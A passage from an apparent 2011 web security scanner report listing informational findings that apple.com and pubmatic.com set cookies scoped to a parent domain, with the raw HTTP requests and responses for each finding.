PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.461_1401136140.76_1310782572.2018_1311177776.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902; domain=pubmatic.com; expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9MTI1MiZ0bD0xNTc2ODAw=1310503209 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&ptid=HOME
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; KRTBCOOKIE_16=226-uid:3460050161923843111; KRTBCOOKIE_153=1923-PFHfHjxXhEglBtlKPwGRHG1Q3RglDd5LPQdIK3DV; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.11265.29191.32345.48153.48669.48674.2083.1073.49076.48190.32326.45639.45640.45641.48203.48205.59481.32350.45677.30833.45683.1150.9855.13450.45708.45714.30915.30364.30878.49317.27165.47281.40626.29899.55492.199.34505.; KRTBCOOKIE_107=1471-uid:ea5c094a-3a81-4d54-b8e2-975f65fd39a9; KRTBCOOKIE_179=2451-uid:5475024508341082; KRTBCOOKIE_200=3683-d9b3a291e16202bc73f25332debaba4289e1f293b56107bf21f8003e8dbde946; PUBMDCID=2; KRTBCOOKIE_148=1699-uid:E3F32BD05A8DDF4D5646D79640088B; PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.461_1401136140.76_1310782572.2018_1311177776.1647_1310434072.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.461_1401136140.76_1310782572.2018_1311177776.806_1340039067.1298_1403835795.2114_1324986825.2138_1404051902; domain=pubmatic.com; expires=Sun, 29-Jun-2014 14:25:02 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

10.20. http://images.apple.com/global/nav/styles/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=CIcsZEOfgL0sAaZ8eSE17AFggQH5Wah4zHUw1N8AvvBssDHyYgWQL91QXmtQCmB4gSwkwYyqm73dAyXB2+z2e4ceAclkObFKyIELq4KsLieOpRdSvUJ+S6iLPn9mPiReSiQQSuJB5Xx8pd9k+fjRNrVLvYSR/N8CtSMpr2o0OIL/oPSq3G29JkjfYJLVKIaYLuI0MceBeHIdr7rjeAwBW93GO1YHAoo2M/YJJ1H79RcXMYqmAxSiNpRHubkoEESHcP58EF8xis6VYMFJ7/NPJfS2d2cy/5PnIef3J/ioYNgZ9FzbG5OQTPUNKsQ6vAOCgkodcB9q2br6R98WoPRTvLZIaONCl7pps02CG8aoBiwA9ZfnFFeyjMDfrEWZ3nUpObyFhipewZyfw46VH2lEGNCc1mbGQcwuLeku5yTG/i3spwWjqaT3N5UhDippIRy8awUxyxhMArUqq7Q0idZNXqa/9jndUv2NE57oFm708RdB0z89rJNr1S6jjRD2iu6MLWFIXVnDCk0EAImAauOAKV0fJbW6RngJTPb5vevYhxpFLnHEn3RIGcxXM0KoB1Qs; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=555
Expires: Tue, 12 Jul 2011 18:08:21 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=CIcsZEOfgL0sAaZ8eSE17AFggQH5Wah4zHUw1N8AvvBssDHyYgWQL91QXmtQCmB4gSwkwYyqm73dAyXB2+z2e4ceAclkObFKyIELq4KsLieOpRdSvUJ+S6iLPn9mPiReSiQQSuJB5Xx8pd9k+fjRNrVLvYSR/N8CtSMpr2o0OIL/oPSq3G29JkjfYJLVKIaYLuI0MceBeHIdr7rjeAwBW93GO1YHAoo2M/YJJ1H79RcXMYqmAxSiNpRHubkoEESHcP58EF8xis6VYMFJ7/NPJfS2d2cy/5PnIef3J/ioYNgZ9FzbG5OQTPUNKsQ6vAOCgkodcB9q2br6R98WoPRTvLZIaONCl7pps02CG8aoBiwA9ZfnFFeyjMDfrEWZ3nUpObyFhipewZyfw46VH2lEGNCc1mbGQcwuLeku5yTG/i3spwWjqaT3N5UhDippIRy8awUxyxhMArUqq7Q0idZNXqa/9jndUv2NE57oFm708RdB0z89rJNr1S6jjRD2iu6MLWFIXVnDCk0EAImAauOAKV0fJbW6RngJTPb5vevYhxpFLnHEn3RIGcxXM0KoB1Qs; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.21. http://images.apple.com/global/scripts/apple_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/apple_core.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=qqRmbycaEdWv2ZnmA2CwWnaQ7IYfLpsMkc+Bn0i2XHLbR7gKLjXcOtz2c+ZUfbZXcZscQs/AXl4PaPr9HuQ4FzZ66Pl0PDDwngZT6lsIbLOF09sUk+P6SIf54aYx5xNmId5A+wIczriN4VqQHs9VO4DBduMbAoToPmNYdLkGTHQqnX+BIwSuVJemestpIM+fza/6QxefclqBxGiK22BY1XpkdF9n9Qgd/pV85T5DqbbID55xGbe33wbAHE59DUMlKa0TwWxBIkxyEGPXGGerewFMUUbYls+/ycEQyuu8FnWNXizkulCFro0Sl00qbBNyDBVdoF6Oh01kny5mZlzhsBMBYJysPo/SjmHxnrwfWE7pzBvkoTY5WpOjOPcrTTJcv05CN5ZkxB/AUdIc2l/fuXXJUOka/ysYajuPN9hTPPN4kF8u8eZ9ZsNtiUPYqgE5GzBs/7fkZB59tD2XoRWJoK/txiars8qRpbVwlfNrS5iBTt7Kz6tFdKeoCKBFqXkY/Fe9oUgP7AXi0aZVyMroDZadqSOfUXZFzvAAGQ0/tVvSjIGlrhJ+mzUeLdYG9PrX; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/apple_core.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "52da-4a36ce1818580"
If-Modified-Since: Mon, 16 May 2011 23:19:02 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Mon, 16 May 2011 23:19:02 GMT
ETag: "52da-4a36ce1818580"
Cache-Control: max-age=308
Expires: Tue, 12 Jul 2011 18:04:14 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=qqRmbycaEdWv2ZnmA2CwWnaQ7IYfLpsMkc+Bn0i2XHLbR7gKLjXcOtz2c+ZUfbZXcZscQs/AXl4PaPr9HuQ4FzZ66Pl0PDDwngZT6lsIbLOF09sUk+P6SIf54aYx5xNmId5A+wIczriN4VqQHs9VO4DBduMbAoToPmNYdLkGTHQqnX+BIwSuVJemestpIM+fza/6QxefclqBxGiK22BY1XpkdF9n9Qgd/pV85T5DqbbID55xGbe33wbAHE59DUMlKa0TwWxBIkxyEGPXGGerewFMUUbYls+/ycEQyuu8FnWNXizkulCFro0Sl00qbBNyDBVdoF6Oh01kny5mZlzhsBMBYJysPo/SjmHxnrwfWE7pzBvkoTY5WpOjOPcrTTJcv05CN5ZkxB/AUdIc2l/fuXXJUOka/ysYajuPN9hTPPN4kF8u8eZ9ZsNtiUPYqgE5GzBs/7fkZB59tD2XoRWJoK/txiars8qRpbVwlfNrS5iBTt7Kz6tFdKeoCKBFqXkY/Fe9oUgP7AXi0aZVyMroDZadqSOfUXZFzvAAGQ0/tVvSjIGlrhJ+mzUeLdYG9PrX; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.22. http://images.apple.com/global/scripts/browserdetect.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/browserdetect.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=CYikw9mUNd+LksdcL1yhHxAK/7W6WcnsQkboRUpHtEDnN0V8p9KL++okE5cE6iwecDzjEUeVIpdTy9LQKFxE+1oMp7pNUpcSLfn2E3nLJTHSATGO1JPQtxjlJnQW/zLcDX9N/oV+Tyxo23oLguPmXP815X/38kpCwKlppUs8Wu5c2CJ+QV3VUDkiFQOM7fvb33OneKiZrCQnvlz7peX4bdktGC01Eivt1JoL3oNyeKJ7NJ1Bs0fsGdBpgU+4v9v51NM0+g5Ji5hCkrN4M49XFyPLMrfUgQai61WxI3f4zRRFMS3H32HAqrZ38/IbdBqTebGNzlp0yFkbeEeH/TF0OHCNKEgeYeGKbgVdY9KM8bHSZ03WWPRsmHtUAZ6sfONQHgHm+/+jKy5EHFIKmvOIhbc4/eCAMXtzchQeTf0cs4kwkF5OH3xNtAupUIzWXkWTPtjelZUfwLn07EFbzWrK98+FODVLywjyVdzPpPlAZGChoASpQEqJjNY8+aAn2kbSzg0XQY+4M08V9ON10ikUSD1wi1EB1iCHaCxIeRWXpA8NSHt9636T0Sy54wo8WTaX; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/browserdetect.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "25fd-4a4e72621e9c0"
If-Modified-Since: Sat, 04 Jun 2011 18:36:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sat, 04 Jun 2011 18:36:31 GMT
ETag: "25fd-4a4e72621e9c0"
Cache-Control: max-age=321
Expires: Tue, 12 Jul 2011 18:04:27 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=CYikw9mUNd+LksdcL1yhHxAK/7W6WcnsQkboRUpHtEDnN0V8p9KL++okE5cE6iwecDzjEUeVIpdTy9LQKFxE+1oMp7pNUpcSLfn2E3nLJTHSATGO1JPQtxjlJnQW/zLcDX9N/oV+Tyxo23oLguPmXP815X/38kpCwKlppUs8Wu5c2CJ+QV3VUDkiFQOM7fvb33OneKiZrCQnvlz7peX4bdktGC01Eivt1JoL3oNyeKJ7NJ1Bs0fsGdBpgU+4v9v51NM0+g5Ji5hCkrN4M49XFyPLMrfUgQai61WxI3f4zRRFMS3H32HAqrZ38/IbdBqTebGNzlp0yFkbeEeH/TF0OHCNKEgeYeGKbgVdY9KM8bHSZ03WWPRsmHtUAZ6sfONQHgHm+/+jKy5EHFIKmvOIhbc4/eCAMXtzchQeTf0cs4kwkF5OH3xNtAupUIzWXkWTPtjelZUfwLn07EFbzWrK98+FODVLywjyVdzPpPlAZGChoASpQEqJjNY8+aAn2kbSzg0XQY+4M08V9ON10ikUSD1wi1EB1iCHaCxIeRWXpA8NSHt9636T0Sy54wo8WTaX; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.23. http://images.apple.com/global/scripts/lib/prototype.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/prototype.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=/GWqwGkzN6Ws3leoAolktOEan1NuvFXQIf/3yzNmSeVJ8DHb7FRpK8DbWRV/yanDpTRknPEuRYyT2l4s+iyqQz1XJAvuebXB/JPDrYBDcCfTsFWBMAlecqV0+cyr1JKYYDn8dXOsvljXIPE6ZAIrD2x3m6Z9qD7jJw76XlIU+ZR1v7fYF+lGLxsdn01CTbAdaYNwHpixwAugmm5SdMhkXGtW/V0ymHvytmVCuq0k8DLIJfqwVTd8T3T7jjF7FbQ4jLtQB4ZYyxAXVSlmr3vBQaFjG34/9qt0OxOBoDHwCJPgK6Cd1A7cU+fLEVkm8MD2Bu1OPGkXyRjGSs2HqppbQQ5tt6APBA0P6jXXcbI48oh55lgUAvgpAWjZxIfj7DLPsILLMHwrjK0Cx2RktBDCnjSAQIPCbfuGhNknwQRaZqhfGMm5oD9WqQEMSWYyQMBW7rOLvjN/dEvjp3GucxubTpZidqjs+Fwp5wSPJ9J2OVr1YOIZ1YzKtyNBd+88ZlnYiPcW9jp1inzVmYAvJ21IVATu2QxPuUmYLUE3XMWVYIPc4vh7CVI8TBZbqKjY/4io; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/prototype.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "27df1-49fbc451c6740"
If-Modified-Since: Thu, 31 Mar 2011 00:21:09 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 31 Mar 2011 00:21:09 GMT
ETag: "27df1-49fbc451c6740"
Cache-Control: max-age=365
Expires: Tue, 12 Jul 2011 18:05:11 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=/GWqwGkzN6Ws3leoAolktOEan1NuvFXQIf/3yzNmSeVJ8DHb7FRpK8DbWRV/yanDpTRknPEuRYyT2l4s+iyqQz1XJAvuebXB/JPDrYBDcCfTsFWBMAlecqV0+cyr1JKYYDn8dXOsvljXIPE6ZAIrD2x3m6Z9qD7jJw76XlIU+ZR1v7fYF+lGLxsdn01CTbAdaYNwHpixwAugmm5SdMhkXGtW/V0ymHvytmVCuq0k8DLIJfqwVTd8T3T7jjF7FbQ4jLtQB4ZYyxAXVSlmr3vBQaFjG34/9qt0OxOBoDHwCJPgK6Cd1A7cU+fLEVkm8MD2Bu1OPGkXyRjGSs2HqppbQQ5tt6APBA0P6jXXcbI48oh55lgUAvgpAWjZxIfj7DLPsILLMHwrjK0Cx2RktBDCnjSAQIPCbfuGhNknwQRaZqhfGMm5oD9WqQEMSWYyQMBW7rOLvjN/dEvjp3GucxubTpZidqjs+Fwp5wSPJ9J2OVr1YOIZ1YzKtyNBd+88ZlnYiPcW9jp1inzVmYAvJ21IVATu2QxPuUmYLUE3XMWVYIPc4vh7CVI8TBZbqKjY/4io; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.24. http://images.apple.com/global/scripts/lib/scriptaculous.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/lib/scriptaculous.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=LvsMZVBspvaW4BUPGB6fKdPBPBPzE4AOtMKQi09iCxvY4N37bXjgonzBRHeFv2bG1tXHPZvA5MDeefh4/4TJNguxYj5BQwlRBhHp8PTaLmLqpAMt7mTrw8KDUlygfnKiG4Z2qArfl9OTnmApOm1vsUekipjsJLNg20mj9qF9yVGby+gT1Gmx0RyRL8RkbjcrMdJpW1HChNjPtBRas7ZTl7d+lqgklAWUbcu+NAnAIIIF1PpC8pejxLXSH0gVYkPbAxhBiAbc1JxNFqINo1qN9hJk3O2MQWv3SzuL9Wf9SajDU6i73sQ0InJo3gud5pExCGD4pGxQNmI1FNd763dPwNKMFx/s+AE3WDYZdU2V9GNIIz6x7Ih7McicbCDvHr6Htvkp4grfBYDv2dZfxkSViMVIcHIbpJM3oQKjws6IBGjACKCFM+r5EiYH+XqIkbkwT3vq3yO7XXMt4QsKmocL8aU/YwaxusrTYvZXLTiR3xnjy4OA+aV/AW+br6xTcZlDVGCDNfVBY/35TAWOdwplNEto/K0MAMDKYqZXRoyu9sulNBarcwVrWptUiw5X1lfq; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "1cf46-44d159ddcfc40"
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Cache-Control: max-age=466
Expires: Tue, 12 Jul 2011 18:06:52 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=LvsMZVBspvaW4BUPGB6fKdPBPBPzE4AOtMKQi09iCxvY4N37bXjgonzBRHeFv2bG1tXHPZvA5MDeefh4/4TJNguxYj5BQwlRBhHp8PTaLmLqpAMt7mTrw8KDUlygfnKiG4Z2qArfl9OTnmApOm1vsUekipjsJLNg20mj9qF9yVGby+gT1Gmx0RyRL8RkbjcrMdJpW1HChNjPtBRas7ZTl7d+lqgklAWUbcu+NAnAIIIF1PpC8pejxLXSH0gVYkPbAxhBiAbc1JxNFqINo1qN9hJk3O2MQWv3SzuL9Wf9SajDU6i73sQ0InJo3gud5pExCGD4pGxQNmI1FNd763dPwNKMFx/s+AE3WDYZdU2V9GNIIz6x7Ih7McicbCDvHr6Htvkp4grfBYDv2dZfxkSViMVIcHIbpJM3oQKjws6IBGjACKCFM+r5EiYH+XqIkbkwT3vq3yO7XXMt4QsKmocL8aU/YwaxusrTYvZXLTiR3xnjy4OA+aV/AW+br6xTcZlDVGCDNfVBY/35TAWOdwplNEto/K0MAMDKYqZXRoyu9sulNBarcwVrWptUiw5X1lfq; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.25. http://images.apple.com/global/scripts/search_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/search_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=uBJRarGVcixAAGSJWzd8d3vxOg/2vSQlRKgrn/RhMuw6NOSdGGc7KhKoy98rT4JxkLPJGcA3G9JVZAKGGUeg0rfqqiJYEIZH3tG4GNao0NE7SqYO5kHNKRZnb2vkIh1+qYDl2ifZGy0POZ8QUYLzaCgiyNlZL5VDv9NhNWAjp97Is3YF3y20l8guUegLMOCwy6y7HJkzOBGxL/wFIxpaDfsp6aWi54M6uHhC29rySJuwnL+BWcVS9xqn+jQhS7msFYsY6R18o5ZJvdSAXByGqbg5REtWpLPIc/PzKvQjdnFOwWp2VlAL0jSLM7hGj7OIeIhamPPUj0ngSnKdT4xp04otxwH1GY1IGzoRcshhLZQWrPkz1JsU7/uXu0Ed9ByhWoKIxYzGOjc2Ss00WUF3y8kbPP/lRbac1Y8eT9J6atlIuTt9+NMYlbNDfZm3kD6KaRdxmy6hzYkPx8geQioXgS601762LWOwcz+/LpnFHCVXRR2bOG+Hn/yrMTk2X42217IRhIBUtth/MeUn6F3SxLHf7nnWg02vBWP8Fq4jLMxGg1I5euN50ftaUZfEaj3A; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/search_decorator.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; ac_search=xss; POD=us~en; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D4%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D2%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dbuy%26vn%3D1%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3B
If-None-Match: "230-4a05bce73b440"
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=529
Expires: Tue, 12 Jul 2011 18:07:55 GMT
Date: Tue, 12 Jul 2011 17:59:06 GMT
Connection: close
Vary: Accept-Encoding
